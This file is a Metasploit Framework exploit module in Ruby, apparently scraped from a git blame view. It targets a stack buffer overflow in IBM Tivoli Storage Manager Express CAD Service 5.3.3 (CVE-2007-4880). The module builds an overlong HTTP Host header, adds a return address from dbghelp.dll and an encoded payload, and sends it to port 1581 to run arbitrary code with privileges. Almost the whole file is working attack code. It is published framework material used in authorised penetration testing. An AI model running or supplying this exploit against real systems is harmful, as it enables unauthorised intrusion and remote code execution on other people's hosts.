metasploit-framework/modules/exploits/windows/http/ibm_tsm_cad_header.rb

65 lines
1.8 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = GoodRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).
By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-4880' ],
[ 'BID', '25743' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 650,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'IBM Tivoli Storage Manager Express 5.3.3', { 'Ret' => 0x0289fbe3 } ], # dbghelp.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2007'))
2013-08-30 21:28:54 +00:00
register_options( [ Opt::RPORT(1581) ], self.class )
end
2013-08-30 21:28:54 +00:00
def exploit
connect
2013-08-30 21:28:54 +00:00
sploit = "GET /BACLIENT HTTP/1.1\r\n"
sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190)
sploit << [target.ret].pack('V') + payload.encoded
2013-08-30 21:28:54 +00:00
print_status("Trying target %s..." % target.name)
2013-08-30 21:28:54 +00:00
sock.put(sploit + "\r\n\r\n")
2013-08-30 21:28:54 +00:00
handler
disconnect
end
end